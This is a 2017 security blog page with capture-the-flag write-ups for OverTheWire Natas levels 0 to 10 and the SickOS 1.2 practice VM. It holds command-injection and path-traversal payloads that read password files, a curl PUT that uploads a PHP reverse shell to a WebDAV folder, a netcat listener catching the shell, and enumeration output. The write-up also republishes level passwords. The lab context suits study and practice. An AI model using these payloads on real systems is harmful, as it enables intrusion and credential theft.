Security Exposed: January 2017

Thursday 19 January 2017

Natas Level 0 to 10

This document is for educational purposes only, I take no responsibility for other peoples actions. This is a review of Natas Level 0 to 10:
http://overthewire.org/wargames/natas/

L 0

<html>
<head>

<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas0", "pass": "natas0" };</script></head>
<body>
<h1>natas0</h1>
<div id="content">
You can find the password for the next level on this page.


</div>
</body>
</html>

L1
Chrome -> Ctrl+U
<html>
<head>

<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas1", "pass": "gtVrDuiDfck831PqWsLEZy5gyDz1clto" };</script></head>
<body oncontextmenu="javascript:alert('right clicking has been blocked!');return false;">
<h1>natas1</h1>
<div id="content">
You can find the password for the
next level on this page, but rightclicking has been blocked!


</div>
</body>
</html>

L2
<html>
<head>

<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas2", "pass": "ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi" };</script></head>
<body>
<h1>natas2</h1>
<div id="content">
There is nothing on this page
<img src="files/pixel.png">
</div>
</body></html>

http://natas.labs.overthewire.org/js/wechall-data.js
var wechalldata = {
"natas0": 1,
"natas1": 2,
"natas2": 3,
"natas3": 4,
"natas4": 5,
"natas5": 6,
"natas6": 7,
"natas7": 8,
"natas8": 15,
"natas9": 14,
"natas10": 13,
"natas11": 12,
"natas12": 11,
"natas13": 10,
"natas14": 9,
"natas15": 16,
"natas16": 17,
"natas17": 18,
"natas18": 137,
"natas19": 138,
"natas20": 139,
"natas21": 140,
"natas22": 141,
"natas23": 142,
"natas24": 213,
"natas25": 214,
"natas26": 215,
"natas27": 216
}

http://natas2.natas.labs.overthewire.org/files/
[IMG] pixel.png 2016-06-25 11:58 303
[TXT] users.txt 2016-06-25 12:42 145

# username:password
alice:BYNdCesZqW
bob:jw2ueICLvT
charlie:G5vCxkVV3m
natas3:sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14
eve:zo4mJWyNj2
mallory:9urtcpzBmH

L3:
User-agent: *
Disallow: /s3cr3t/

http://natas3.natas.labs.overthewire.org//s3cr3t/users.txt
natas4:Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ

L4:
Burp -> Proxy -> Intercept On -> Add -> Refferer natas5.natas.labs.overthewire.org

Access granted. The password for natas5 is iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq

L5:
GET / HTTP/1.1
Host: natas5.natas.labs.overthewire.org
Cache-Control: max-age=0
Authorization: Basic bmF0YXM1OmlYNklPZm1wTjdBWU9RR1B3dG4zZlhwYmFKVkpjSGZx
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: bg,en-US;q=0.8,en;q=0.6
Cookie: __cfduid=ddd2731304b504d954af409bf2c0724731481120164; loggedin=1
DNT: 1
Connection: close

<html>
<head>

<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas5", "pass": "iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq" };</script></head>
<body>
<h1>natas5</h1>
<div id="content">
Access granted. The password for natas6 is aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1</div>
</body>
</html>

L6:
<html>
<head>

<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas6", "pass": "<censored>" };</script></head>
<body>
<h1>natas6</h1>
<div id="content">

<?

include "includes/secret.inc";

if(array_key_exists("submit", $_POST)) {
if($secret == $_POST['secret']) {
print "Access granted. The password for natas7 is <censored>";
} else {
print "Wrong secret";
}
}
?>

<form method=post>
Input secret: <input name=secret><br>
<input type=submit name=submit>
</form>

<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
</div>
</body>
</html>

http://natas6.natas.labs.overthewire.org/includes/secret.inc
<?
$secret = "FOEIUWGHFEEUHOFUOIU";
?>

Access granted. The password for natas7 is 7z3hEENjQtflzgnT29q7wAvMNfZdh0i9

L7:

<html>
<head>

<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas7", "pass": "7z3hEENjQtflzgnT29q7wAvMNfZdh0i9" };</script></head>
<body>
<h1>natas7</h1>
<div id="content">

<a href="index.php?page=home">Home</a>
<a href="index.php?page=about">About</a>
<br>
<br>


</div>
</body>
</html>

http://natas7.natas.labs.overthewire.org/index.php?page=/etc/natas_webpass/natas8
DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe

L8:
<html>
<head>

<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas8", "pass": "<censored>" };</script></head>
<body>
<h1>natas8</h1>
<div id="content">

<?

$encodedSecret = "3d3d516343746d4d6d6c315669563362";

function encodeSecret($secret) {
return bin2hex(strrev(base64_encode($secret)));
}

if(array_key_exists("submit", $_POST)) {
if(encodeSecret($_POST['secret']) == $encodedSecret) {
print "Access granted. The password for natas9 is <censored>";
} else {
print "Wrong secret";
}
}
?>

<form method=post>
Input secret: <input name=secret><br>
<input type=submit name=submit>
</form>

<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
</div>
</body>
</html>

echo 3d3d516343746d4d6d6c315669563362 | xxd -r -p | rev | base64 -d

oubWYf2kBq

Access granted. The password for natas9 is W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl

L9:
<html>
<head>

<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas9", "pass": "W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl" };</script></head>
<body>
<h1>natas9</h1>
<div id="content">
<form>
Find words containing: <input name=needle><input type=submit name=submit value=Search><br><br>
</form>

Output:
<pre>
</pre>

<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
</div>
</body>
</html>

<html>
<head>

<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas9", "pass": "<censored>" };</script></head>
<body>
<h1>natas9</h1>
<div id="content">
<form>
Find words containing: <input name=needle><input type=submit name=submit value=Search><br><br>
</form>

Output:
<pre>
<?
$key = "";

if(array_key_exists("needle", $_REQUEST)) {
$key = $_REQUEST["needle"];
}

if($key != "") {
passthru("grep -i $key dictionary.txt");
}
?>
</pre>

<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
</div>
</body>
</html>

http://natas9.natas.labs.overthewire.org/dictionary.txt

test; ls -la ../
Output:
-rw-r----- 1 natas9 natas9 460878 Jun 25 2016 dictionary.txt

../:
total 156
drwxr-xr-x 39 root root 4096 Jul 10 14:12 .
drwxr-xr-x 5 root root 4096 Nov 14 2014 ..
drwxr-xr-x 5 root root 4096 Jun 25 2016 main
drwxr-x--- 2 natas0 natas0 4096 Jun 25 2016 natas0
drwxr-x--- 2 natas1 natas1 4096 Jun 25 2016 natas1
drwxr-x--- 2 natas10 natas10 4096 Jun 25 2016 natas10
drwxr-x--- 2 natas11 natas11 4096 Jun 25 2016 natas11
drwxr-x--- 3 natas12 natas12 4096 Jun 25 2016 natas12
drwxr-x--- 3 natas13 natas13 4096 Jun 25 2016 natas13
drwxr-x--- 2 natas14 natas14 4096 Jun 25 2016 natas14
drwxr-x--- 2 natas15 natas15 4096 Jun 25 2016 natas15
drwxr-x--- 2 natas16 natas16 4096 Jun 25 2016 natas16
drwxr-x--- 2 natas17 natas17 4096 Jul 10 14:12 natas17
drwxr-x--- 2 natas18 natas18 4096 Jun 25 2016 natas18
drwxr-x--- 2 natas19 natas19 4096 Jun 25 2016 natas19
drwxr-x--- 3 natas2 natas2 4096 Jun 25 2016 natas2
drwxr-x--- 2 natas20 natas20 4096 Jun 25 2016 natas20
drwxr-x--- 2 natas21 natas21 4096 Jun 25 2016 natas21
drwxr-x--- 2 natas21 natas21 4096 Jun 25 2016 natas21-experimenter
drwxr-x--- 2 natas22 natas22 4096 Jun 25 2016 natas22
drwxr-x--- 2 natas23 natas23 4096 Jun 25 2016 natas23
drwxr-x--- 2 natas24 natas24 4096 Jun 25 2016 natas24
drwxr-x--- 3 natas25 natas25 4096 Jun 25 2016 natas25
drwxr-x--- 3 natas26 natas26 4096 Jun 25 2016 natas26
drwxr-x--- 2 natas27 natas27 4096 Jun 25 2016 natas27
drwxr-x--- 2 natas28 natas28 4096 Jun 25 2016 natas28
drwxr-x--- 2 natas29 natas29 4096 Jun 25 2016 natas29
drwxr-x--- 3 natas3 natas3 4096 Jun 25 2016 natas3
drwxr-x--- 2 natas30 natas30 4096 Jun 25 2016 natas30
drwxr-x--- 3 natas31 natas31 4096 Jun 25 2016 natas31
drwxr-x--- 3 natas32 natas32 4096 Jun 25 2016 natas32
drwxr-x--- 2 natas33 natas33 4096 Jun 25 2016 natas33
drwxr-x--- 2 natas4 natas4 4096 Jun 25 2016 natas4
drwxr-x--- 2 natas5 natas5 4096 Jun 25 2016 natas5
drwxr-x--- 3 natas6 natas6 4096 Jun 25 2016 natas6
drwxr-x--- 2 natas7 natas7 4096 Jun 25 2016 natas7
drwxr-x--- 2 natas8 natas8 4096 Jun 25 2016 natas8
drwxr-x--- 2 natas9 natas9 4096 Jun 25 2016 natas9
drwxr-x--- 4 root www-data 4096 Jun 25 2016 stats

test; ls -la ../../../../../-rw-r----- 1 natas9 natas9 460878 Jun 25 2016 dictionary.txt

../../../../../:
total 7965
drwxr-xr-x 26 root root 4096 Mar 13 2016 .
drwxr-xr-x 26 root root 4096 Mar 13 2016 ..
-rw-r--r-- 1 root root 2797 Nov 4 2015 README.txt
lrwxrwxrwx 1 root root 15 Nov 14 2014 behemoth -> /games/behemoth
drwxr-xr-x 2 root root 4096 Nov 17 09:14 bin
drwxr-xr-x 2 root root 4096 Apr 20 2014 boot
drwxr-xr-x 12 root root 13680 Dec 23 13:00 dev
drwxr-xr-x 7 root root 4096 Jan 12 2015 drifter
lrwxrwxrwx 1 root root 11 Nov 14 2014 eloi -> /games/eloi
drwxr-xr-x 108 root root 4096 Jan 6 13:46 etc
drwxr-xr-x 11 root root 1024 Mar 18 2015 games
drwxr-xr-x 172 root root 4096 Jul 10 14:12 home
lrwxrwxrwx 1 root root 14 Nov 14 2014 krypton -> /games/krypton
drwxr-xr-x 18 root root 4096 Jun 10 2016 lib
drwxr-xr-x 2 root root 4096 Jun 10 2016 lib32
drwxr-xr-x 2 root root 4096 Jun 10 2016 lib64
drwxr-xr-x 2 root root 4096 Jun 10 2016 libx32
drwx------ 2 root root 16384 Apr 20 2014 lost+found
lrwxrwxrwx 1 root root 14 Nov 14 2014 manpage -> /games/manpage
lrwxrwxrwx 1 root root 11 Nov 14 2014 maze -> /games/maze
drwxr-xr-x 3 root root 4096 Apr 20 2014 media
drwxr-xr-x 2 root root 4096 Apr 10 2014 mnt
lrwxrwxrwx 1 root root 13 Nov 14 2014 narnia -> /games/narnia
drwxr-xr-x 2 root root 4096 Apr 16 2014 opt
dr-xr-xr-x 547 root root 0 Dec 23 13:00 proc
drwx------ 11 root root 4096 Jul 10 14:12 root
drwxr-xr-x 18 root root 680 Jan 6 20:52 run
drwxr-xr-x 2 root root 12288 Sep 30 13:28 sbin
lrwxrwxrwx 1 root root 13 Nov 14 2014 semtex -> /games/semtex
drwxr-xr-x 2 root root 4096 Apr 16 2014 srv
dr-xr-xr-x 13 root root 0 Dec 23 13:29 sys
drwxrwx-wt 1 root root 8036352 Jan 6 20:52 tmp
drwxr-xr-x 12 root root 4096 Nov 14 2014 usr
lrwxrwxrwx 1 root root 13 Nov 14 2014 utumno -> /games/utumno
drwxr-xr-x 15 root root 4096 Nov 14 2014 var
lrwxrwxrwx 1 root root 13 Nov 14 2014 vortex -> /games/vortex

test;cat ../../../../../README.txt
Output:

,----.. ,----, .---.
/ / \ ,/ .`| /. ./|
/ . : ,` .' : .--'. ' ;
. / ;. \ ; ; / /__./ \ : |
. ; / ` ; .'___,/ ,' .--'. ' \' .
; | ; \ ; | | : | /___/ \ | ' '
| : | ; | ' ; |.'; ; ; \ \; :
. | ' ' ' : `----' | | \ ; ` |
' ; \; / | ' : ; . \ .\ ;
\ \ ', / | | ' \ \ ' \ |
; : / ' : | : ' |--"
\ \ .' ; |.' \ \ ;
www. `---` ver '---' he '---" ire.org

Welcome to the OverTheWire games machine!

If you find any problems, please report them to Steven on
irc.overthewire.org.

--[ Playing the games ]--

This machine holds several wargames.
If you are playing "somegame", then:

* USERNAMES are somegame0, somegame1, ...
* Most LEVELS are stored in /somegame/.
* PASSWORDS for each level are stored in /etc/somegame_pass/.

Write-access to homedirectories is disabled. It is advised to create a
working directory with a hard-to-guess name in /tmp/. You can use the
command "mktemp -d" in order to generate a random and hard to guess
directory in /tmp/. Read-access to both /tmp/ and /proc/ is disabled
so that users can not snoop on eachother.

Please play nice:

* don't leave orphan processes running
* don't leave exploit-files laying around
* don't annoy other players
* don't post passwords or spoilers
* again, DONT POST SPOILERS!
This includes writeups of your solution on your blog or website!

--[ Tips ]--

This machine has a 64bit processor and many security-features enabled
by default, although ASLR has been switched off. The following
compiler flags might be interesting:

-m32 compile for 32bit
-fno-stack-protector disable ProPolice
-Wl,-z,norelro disable relro

In addition, the execstack tool can be used to flag the stack as
executable on ELF binaries.

Finally, network-access is limited for most levels by a local
firewall.

--[ Tools ]--

For your convenience we have installed a few usefull tools which you can find
in the following locations:

* peda (https://github.com/longld/peda.git) in /usr/local/peda/
* gdbinit (https://github.com/gdbinit/Gdbinit) in /usr/local/gdbinit/
* pwntools (https://github.com/Gallopsled/pwntools) in /usr/src/pwntools/
* radare2 (http://www.radare.org/) should be in $PATH

--[ More information ]--

For more information regarding individual wargames, visit
http://www.overthewire.org/wargames/

For questions or comments, contact us through IRC on
irc.overthewire.org.

test;cat ../../../../../etc/natas_webpass/natas10
nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu

test;cat ../../../../../etc/lsb-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=14.04
DISTRIB_CODENAME=trusty
DISTRIB_DESCRIPTION="Ubuntu 14.04.5 LTS

L10:
<html>
<head>

<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas10", "pass": "<censored>" };</script></head>
<body>
<h1>natas10</h1>
<div id="content">

For security reasons, we now filter on certain characters<br/><br/>
<form>
Find words containing: <input name=needle><input type=submit name=submit value=Search><br><br>
</form>

Output:
<pre>
<?
$key = "";

if(array_key_exists("needle", $_REQUEST)) {
$key = $_REQUEST["needle"];
}

if($key != "") {
if(preg_match('/[;|&]/',$key)) {
print "Input contains an illegal character!";
} else {
passthru("grep -i $key dictionary.txt");
}
}
?>
</pre>

<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
</div>
</body>
</html>

. /etc/natas_webpass/natas11
U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK

Regards,
Yuriy Stanchev/URIX

SickOS 1.2

This document is for educational purposes only, I take no responsibility for other peoples actions. This is a review of SickOs 1.2 vulnarable VM:
https://www.vulnhub.com/entry/sickos-12,144/

Home brewed tools used: https://github.com/iuristanchev/pentesting_tools

Currently scanning: Finished! | Screen View: Unique Hosts

5 Captured ARP Req/Rep packets, from 5 hosts. Total size: 300
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.1.9 00:0c:29:98:f5:19 1 60 VMware, Inc.

Starting Nmap 7.01 ( https://nmap.org ) at 2017-01-04 20:24 EET
Nmap scan report for 192.168.1.9
Host is up (0.00026s latency).
PORT STATE SERVICE VERSION
80/tcp open http lighttpd 1.4.28
|_http-server-header: lighttpd/1.4.28
| http-useragent-tester:
|
| Allowed User Agents:
| Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
| libwww
| lwp-trivial
| libcurl-agent/1.0
| PHP/
| Python-urllib/2.5
| GT::WWW
| Snoopy
| MFC_Tear_Sample
| HTTP::Lite
| PHPCrawl
| URI::Fetch
| Zend_Http_Client
| http client
| PECL::HTTP
| Wget/1.13.4 (linux-gnu)
| WWW-Mechanize/1.34
|_
MAC Address: 00:0C:29:98:F5:19 (VMware)

Starting Nmap 7.01 ( https://nmap.org ) at 2017-01-04 20:26 EET
Nmap scan report for 192.168.1.9
Host is up (0.00016s latency).
PORT STATE SERVICE
80/tcp open http
| http-comments-displayer:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.1.9
|
| Path: http://192.168.1.9:80/
| Line number: 96
| Comment:
| 
|
| Path: http://192.168.1.9:80/
| Line number: 96
| Comment:
|_ ///\\\ -->>>>
MAC Address: 00:0C:29:98:F5:19 (VMware)

amap v5.4 (www.thc.org/thc-amap) started at 2017-01-04 20:34:33 - APPLICATION MAPPING mode

Total amount of tasks to perform in plain connect mode: 23
Waiting for timeout on 23 connections ...
Protocol on 192.168.1.9:80/tcp matches http - banner: HTTP/1.0 200 OK\r\nX-Powered-By PHP/5.3.10-1ubuntu3.21\r\nContent-type text/html\r\nContent-Length 163\r\nConnection close\r\nDate Wed, 04 Jan 2017 203433 GMT\r\nServer lighttpd/1.4.28\r\n\r\n<html>\n\n<img src="blow.jpg">\n\n</html>\n\n\n\n\n\n\n\n\n\n\n

DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Wed Jan 4 20:57:05 2017
URL_BASE: http://192.168.1.9:80/
WORDLIST_FILES: /usr/share/wordlists/dirb/big.txt

-----------------

GENERATED WORDS: 20458

---- Scanning URL: http://192.168.1.9:80/ ----
==> DIRECTORY: http://192.168.1.9:80/test/
+ http://192.168.1.9:80/~sys~ (CODE:403|SIZE:345)

---- Entering directory: http://192.168.1.9:80/test/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

* Trying 192.168.1.9...
* Connected to 192.168.1.9 (192.168.1.9) port 80 (#0)
> OPTIONS /test/ HTTP/1.1
> Host: 192.168.1.9
> User-Agent: curl/7.47.0
> Accept: */*
>
< HTTP/1.1 200 OK
< DAV: 1,2
< MS-Author-Via: DAV
< Allow: PROPFIND, DELETE, MKCOL, PUT, MOVE, COPY, PROPPATCH, LOCK, UNLOCK
< Allow: OPTIONS, GET, HEAD, POST
< Content-Length: 0
< Date: Wed, 04 Jan 2017 21:01:06 GMT
< Server: lighttpd/1.4.28
<
* Connection #0 to host 192.168.1.9 left intact
nc -nlvp 443
curl --upload-file /root/Desktop/pentesting_tools/tools/php-reverse-shell.txt -v --url http://192.168.1.9/test/shell.php -0 --http1.0

* Trying 192.168.1.9...
* Connected to 192.168.1.9 (192.168.1.9) port 80 (#0)
> PUT /test/shell.php HTTP/1.0
> Host: 192.168.1.9
> User-Agent: curl/7.47.0
> Accept: */*
> Content-Length: 5495
>
* We are completely uploaded and fine
* HTTP 1.0, assume close after body
< HTTP/1.0 201 Created
< Content-Length: 0
< Connection: close
< Date: Wed, 04 Jan 2017 21:43:01 GMT
< Server: lighttpd/1.4.28
<
* Closing connection 0

nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.1.20] from (UNKNOWN) [192.168.1.9] 46960
Linux ubuntu 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux
13:43:47 up 1:30, 0 users, load average: 0.02, 0.04, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash: no job control in this shell
www-data@ubuntu:/$ whoami
whoami
www-data
www-data@ubuntu:/$

python -c 'import pty; pty.spawn("/bin/sh")'

cat /etc/debian_version
wheezy/sid

uname -v
#25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014

#########################################################
# Local Linux Enumeration & Privilege Escalation Script #
#########################################################
# www.rebootuser.com
#

Debug Info
thorough tests = disabled

Scan started at:
Thu Jan 5 09:43:36 PST 2017

### SYSTEM ##############################################
Kernel information:
Linux ubuntu 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux

Kernel information (continued):
Linux version 3.11.0-15-generic (buildd@akateko) (gcc version 4.6.3 (Ubuntu/Linaro 4.6.3-1ubuntu5) ) #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014

Specific release information:
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=12.04
DISTRIB_CODENAME=precise
DISTRIB_DESCRIPTION="Ubuntu 12.04.4 LTS"
NAME="Ubuntu"
VERSION="12.04.4 LTS, Precise Pangolin"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu precise (12.04.4 LTS)"
VERSION_ID="12.04"

Hostname:
ubuntu

### USER/GROUP ##########################################
Current user/group info:
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Users that have previously logged onto the system:
Username Port From Latest
root pts/0 192.168.0.100 Tue Apr 26 03:57:15 -0700 2016
john tty1 Wed Mar 30 05:09:38 -0700 2016

All users and uid/gid info:
root:x:0:0
daemon:x:1:1
bin:x:2:2
sys:x:3:3
sync:x:4:65534
games:x:5:60
man:x:6:12
lp:x:7:7
mail:x:8:8
news:x:9:9
uucp:x:10:10
proxy:x:13:13
www-data:x:33:33
backup:x:34:34
list:x:38:38
irc:x:39:39
gnats:x:41:41
nobody:x:65534:65534
libuuid:x:100:101
syslog:x:101:103
messagebus:x:102:104
john:x:1000:1000
sshd:x:103:65534

Group memberships:
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=100(libuuid) gid=101(libuuid) groups=101(libuuid)
uid=101(syslog) gid=103(syslog) groups=103(syslog)
uid=102(messagebus) gid=104(messagebus) groups=104(messagebus)
uid=1000(john) gid=1000(john) groups=1000(john),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),109(sambashare)
uid=103(sshd) gid=65534(nogroup) groups=65534(nogroup)

Sample entires from /etc/passwd (searching for uid values 0, 500, 501, 502, 1000, 1001, 1002, 2000, 2001, 2002):
root:x:0:0:root:/root:/bin/bash
john:x:1000:1000:Ubuntu 12.x,,,:/home/john:/bin/bash

Super user account(s):
root

Are permissions on /home directories lax:
total 12K
drwxr-xr-x 3 root root 4.0K Mar 30 2016 .
drwxr-xr-x 22 root root 4.0K Mar 30 2016 ..
drwxr-xr-x 3 john john 4.0K Apr 12 2016 john

Root is allowed to login via SSH:
PermitRootLogin yes

### ENVIRONMENTAL #######################################
Path information:
/sbin:/bin:/usr/sbin:/usr/bin

Available shells:
# /etc/shells: valid login shells
/bin/sh
/bin/dash
/bin/bash
/bin/rbash

Current umask value:
0000
u=rwx,g=rwx,o=rwx

umask value as specified in /etc/login.defs:
UMASK 022

Password and storage information:
PASS_MAX_DAYS 99999
PASS_MIN_DAYS 0
PASS_WARN_AGE 7
ENCRYPT_METHOD SHA512

### JOBS/TASKS ##########################################
Cron jobs:
-rw-r--r-- 1 root root 722 Jun 19 2012 /etc/crontab

/etc/cron.daily:
total 72
drwxr-xr-x 2 root root 4096 Apr 12 2016 .
drwxr-xr-x 84 root root 4096 Jan 5 09:41 ..
-rw-r--r-- 1 root root 102 Jun 19 2012 .placeholder
-rwxr-xr-x 1 root root 15399 Nov 15 2013 apt
-rwxr-xr-x 1 root root 314 Apr 18 2013 aptitude
-rwxr-xr-x 1 root root 502 Mar 31 2012 bsdmainutils
-rwxr-xr-x 1 root root 2032 Jun 4 2014 chkrootkit
-rwxr-xr-x 1 root root 256 Oct 14 2013 dpkg
-rwxr-xr-x 1 root root 338 Dec 20 2011 lighttpd
-rwxr-xr-x 1 root root 372 Oct 4 2011 logrotate
-rwxr-xr-x 1 root root 1365 Dec 28 2012 man-db
-rwxr-xr-x 1 root root 606 Aug 17 2011 mlocate
-rwxr-xr-x 1 root root 249 Sep 12 2012 passwd
-rwxr-xr-x 1 root root 2417 Jul 1 2011 popularity-contest
-rwxr-xr-x 1 root root 2947 Jun 19 2012 standard

/etc/cron.hourly:
total 12
drwxr-xr-x 2 root root 4096 Mar 30 2016 .
drwxr-xr-x 84 root root 4096 Jan 5 09:41 ..
-rw-r--r-- 1 root root 102 Jun 19 2012 .placeholder

/etc/cron.monthly:
total 12
drwxr-xr-x 2 root root 4096 Mar 30 2016 .
